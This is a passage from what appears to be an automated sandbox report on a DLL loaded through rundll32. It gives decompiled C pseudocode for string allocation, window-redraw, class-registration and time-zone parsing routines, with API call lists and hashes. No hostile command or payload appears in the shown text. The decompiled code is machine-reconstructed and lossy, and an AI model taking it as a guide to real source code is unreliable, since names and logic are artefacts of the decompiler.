									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E100245D3();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}




















                                                                                                            0x10039830
                                                                                                            0x1003983d
                                                                                                            0x10039845
                                                                                                            0x1003984b
                                                                                                            0x10039851
                                                                                                            0x1003985c
                                                                                                            0x1003985f
                                                                                                            0x10039864
                                                                                                            0x1003986a
                                                                                                            0x10039875
                                                                                                            0x10039877
                                                                                                            0x10039887
                                                                                                            0x10039935
                                                                                                            0x10039937
                                                                                                            0x1003993e
                                                                                                            0x10039946
                                                                                                            0x10039947
                                                                                                            0x1003995a
                                                                                                            0x1003995f
                                                                                                            0x10039964
                                                                                                            0x10039969
                                                                                                            0x10039969
                                                                                                            0x1003996e
                                                                                                            0x1003999b
                                                                                                            0x1003999c
                                                                                                            0x100399a6
                                                                                                            0x100399a9
                                                                                                            0x100399b0
                                                                                                            0x100399b5
                                                                                                            0x100399c0
                                                                                                            0x100399ca
                                                                                                            0x100399d7
                                                                                                            0x100399dc
                                                                                                            0x100399b7
                                                                                                            0x100399b7
                                                                                                            0x100399b7
                                                                                                            0x100399e3
                                                                                                            0x100399e9
                                                                                                            0x100399e9
                                                                                                            0x100399f0
                                                                                                            0x10039a00
                                                                                                            0x10039a05
                                                                                                            0x10039a10
                                                                                                            0x10039a1a
                                                                                                            0x10039a27
                                                                                                            0x10039a07
                                                                                                            0x10039a07
                                                                                                            0x10039a07
                                                                                                            0x10039a2d
                                                                                                            0x10039a33
                                                                                                            0x10039a33
                                                                                                            0x10039a51
                                                                                                            0x10039a51
                                                                                                            0x10039970
                                                                                                            0x10039977
                                                                                                            0x10039981
                                                                                                            0x10039990
                                                                                                            0x10039995
                                                                                                            0x00000000
                                                                                                            0x10039995
                                                                                                            0x10039949
                                                                                                            0x1003994e
                                                                                                            0x10039953
                                                                                                            0x00000000
                                                                                                            0x10039953
                                                                                                            0x10039890
                                                                                                            0x10039897
                                                                                                            0x1003989d
                                                                                                            0x100398a3
                                                                                                            0x100398a6
                                                                                                            0x100398ad
                                                                                                            0x100398b3
                                                                                                            0x100398b7
                                                                                                            0x100398be
                                                                                                            0x100398c8
                                                                                                            0x100398da
                                                                                                            0x100398df
                                                                                                            0x100398df
                                                                                                            0x100398e6
                                                                                                            0x100398ec
                                                                                                            0x100398ec
                                                                                                            0x100398ef
                                                                                                            0x100398f2
                                                                                                            0x100398f7
                                                                                                            0x100398fb
                                                                                                            0x10039902
                                                                                                            0x1003990c
                                                                                                            0x10039919
                                                                                                            0x1003991e
                                                                                                            0x1003991e
                                                                                                            0x10039925
                                                                                                            0x1003992b
                                                                                                            0x1003992b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                                                              • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                                                            • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2903237683-0
                                                                                                            • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                                                            • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                                                            0x1002f6b4
                                                                                                            0x1002f6bb
                                                                                                            0x1002f6c2
                                                                                                            0x1002f6cc
                                                                                                            0x1002f6da
                                                                                                            0x1002f6e0
                                                                                                            0x1002f6e6
                                                                                                            0x1002f6e9
                                                                                                            0x1002f6ef
                                                                                                            0x1002f6f4
                                                                                                            0x1002f6f7
                                                                                                            0x1002f6fa
                                                                                                            0x1002f6fd
                                                                                                            0x1002f714
                                                                                                            0x1002f723
                                                                                                            0x1002f73a
                                                                                                            0x1002f749
                                                                                                            0x1002f74f
                                                                                                            0x1002f752
                                                                                                            0x1002f752
                                                                                                            0x1002f757
                                                                                                            0x1002f774
                                                                                                            0x1002f77f
                                                                                                            0x1002f796
                                                                                                            0x1002f7a1
                                                                                                            0x1002f7a1
                                                                                                            0x00000000
                                                                                                            0x1002f7a7
                                                                                                            0x1002f7ab

                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                                                            • GetWindowRect.USER32 ref: 1002F6DA
                                                                                                            • SetRect.USER32 ref: 1002F714
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                                                            • SetRect.USER32 ref: 1002F73A
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                                                            • SetRect.USER32 ref: 1002F774
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                                                            • SetRect.USER32 ref: 1002F796
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Invalidate$Window$Proc
                                                                                                            • String ID:
                                                                                                            • API String ID: 570070710-0
                                                                                                            • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                                                            • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                                                            0x10020ba0
                                                                                                            0x10020bab
                                                                                                            0x10020bae
                                                                                                            0x10020bc3
                                                                                                            0x10020bd7
                                                                                                            0x10020c20
                                                                                                            0x10020c20
                                                                                                            0x10020bd9
                                                                                                            0x10020bdc
                                                                                                            0x10020be8
                                                                                                            0x10020c78
                                                                                                            0x10020c78
                                                                                                            0x10020bee
                                                                                                            0x10020bef
                                                                                                            0x10020bf4
                                                                                                            0x10020c03
                                                                                                            0x10020c07
                                                                                                            0x10020c0a
                                                                                                            0x10020c13
                                                                                                            0x10020c1e
                                                                                                            0x10020c2c
                                                                                                            0x10020c3a
                                                                                                            0x10020c60
                                                                                                            0x10020c67
                                                                                                            0x10020c3c
                                                                                                            0x10020c48
                                                                                                            0x10020c51
                                                                                                            0x10020c55
                                                                                                            0x10020c59
                                                                                                            0x10020c59
                                                                                                            0x10020c6d
                                                                                                            0x10020c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10020c1e
                                                                                                            0x10020be8
                                                                                                            0x10020bc5
                                                                                                            0x10020bc7
                                                                                                            0x10020bc7
                                                                                                            0x10020c80
                                                                                                            0x10020c89

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                            • String ID:
                                                                                                            • API String ID: 3690589370-0
                                                                                                            • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                                                            • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018E14 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 212timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6(0x10042ccc);
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}


































                                                                                                            0x10018e14
                                                                                                            0x10018e16
                                                                                                            0x10018e1b
                                                                                                            0x10018e22
                                                                                                            0x10018e27
                                                                                                            0x10018e2d
                                                                                                            0x10018e30
                                                                                                            0x10018e36
                                                                                                            0x10018e39
                                                                                                            0x10018e3f
                                                                                                            0x10018e46
                                                                                                            0x10018e58
                                                                                                            0x10018e5a
                                                                                                            0x10018e5f
                                                                                                            0x10018f1d
                                                                                                            0x10018f22
                                                                                                            0x10018f24
                                                                                                            0x10018f26
                                                                                                            0x10018f27
                                                                                                            0x10018f2d
                                                                                                            0x10018f2d
                                                                                                            0x10018f38
                                                                                                            0x10018f3e
                                                                                                            0x10018f41
                                                                                                            0x00000000
                                                                                                            0x10018f47
                                                                                                            0x10018f4a
                                                                                                            0x10018f50
                                                                                                            0x10018f55
                                                                                                            0x10018f58
                                                                                                            0x10018f5d
                                                                                                            0x10018f64
                                                                                                            0x10018f66
                                                                                                            0x10018f6f
                                                                                                            0x10018f6f
                                                                                                            0x10018f71
                                                                                                            0x10018f71
                                                                                                            0x10018f76
                                                                                                            0x10018f7d
                                                                                                            0x10018f9e
                                                                                                            0x10018f9e
                                                                                                            0x10018fa4
                                                                                                            0x00000000
                                                                                                            0x10018f7f
                                                                                                            0x10018f7f
                                                                                                            0x10018f84
                                                                                                            0x10018f86
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018f88
                                                                                                            0x10018f97
                                                                                                            0x10018faa
                                                                                                            0x10018fc6
                                                                                                            0x10018fc8
                                                                                                            0x10018fca
                                                                                                            0x10018fdc
                                                                                                            0x10018fdc
                                                                                                            0x10018fe1
                                                                                                            0x10018fe4
                                                                                                            0x10018ffa
                                                                                                            0x10018ffc
                                                                                                            0x10018ffe
                                                                                                            0x10019010
                                                                                                            0x10019010
                                                                                                            0x10019015
                                                                                                            0x00000000
                                                                                                            0x10019015
                                                                                                            0x10019000
                                                                                                            0x10019003
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019005
                                                                                                            0x1001900a
                                                                                                            0x00000000
                                                                                                            0x1001900a
                                                                                                            0x10018fcc
                                                                                                            0x10018fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018fd1
                                                                                                            0x10018fd6
                                                                                                            0x00000000
                                                                                                            0x10018fd6
                                                                                                            0x10018f7d
                                                                                                            0x10018e6e
                                                                                                            0x10018e6e
                                                                                                            0x10018e75
                                                                                                            0x10018e98
                                                                                                            0x10018ea0
                                                                                                            0x10018ea7
                                                                                                            0x10018eae
                                                                                                            0x10019018
                                                                                                            0x1001901e
                                                                                                            0x100190b6
                                                                                                            0x100190bb
                                                                                                            0x100190bb
                                                                                                            0x10018eb6
                                                                                                            0x10018ebc
                                                                                                            0x10018ebd
                                                                                                            0x10018ec1
                                                                                                            0x10018ecf
                                                                                                            0x10018ed7
                                                                                                            0x10018edc
                                                                                                            0x10018ee0
                                                                                                            0x10018ee6
                                                                                                            0x10018ee8
                                                                                                            0x10018eef
                                                                                                            0x10018eef
                                                                                                            0x10018ef1
                                                                                                            0x10018ef6
                                                                                                            0x10018efd
                                                                                                            0x10018f04
                                                                                                            0x10018f04
                                                                                                            0x10018f08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018f1a
                                                                                                            0x10018f1a
                                                                                                            0x10019038
                                                                                                            0x1001903b
                                                                                                            0x1001907b
                                                                                                            0x1001907b
                                                                                                            0x1001907e
                                                                                                            0x10019080
                                                                                                            0x10019080
                                                                                                            0x10019086
                                                                                                            0x10019089
                                                                                                            0x1001908e
                                                                                                            0x10019090
                                                                                                            0x100190ae
                                                                                                            0x100190b3
                                                                                                            0x10019092
                                                                                                            0x1001909b
                                                                                                            0x100190a3
                                                                                                            0x100190a8
                                                                                                            0x100190a8
                                                                                                            0x00000000
                                                                                                            0x10019090
                                                                                                            0x1001903d
                                                                                                            0x1001903f
                                                                                                            0x10019044
                                                                                                            0x10019048
                                                                                                            0x10019055
                                                                                                            0x10019055
                                                                                                            0x10019057
                                                                                                            0x10019059
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019050
                                                                                                            0x10019052
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019060
                                                                                                            0x10019068
                                                                                                            0x10019075
                                                                                                            0x10019075
                                                                                                            0x10019077
                                                                                                            0x10019079
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019070
                                                                                                            0x10019072
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x00000000
                                                                                                            0x10019075
                                                                                                            0x10018e82
                                                                                                            0x00000000
                                                                                                            0x10018e88
                                                                                                            0x10018e88
                                                                                                            0x10018e8d
                                                                                                            0x10018e8f
                                                                                                            0x10018e91
                                                                                                            0x10018e92
                                                                                                            0x10018e97
                                                                                                            0x00000000
                                                                                                            0x10018e8f
                                                                                                            0x10018e82

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10018E27
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • _strlen.LIBCMT ref: 10018E99
                                                                                                            • _strncpy.LIBCMT ref: 10018ECF
                                                                                                              • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
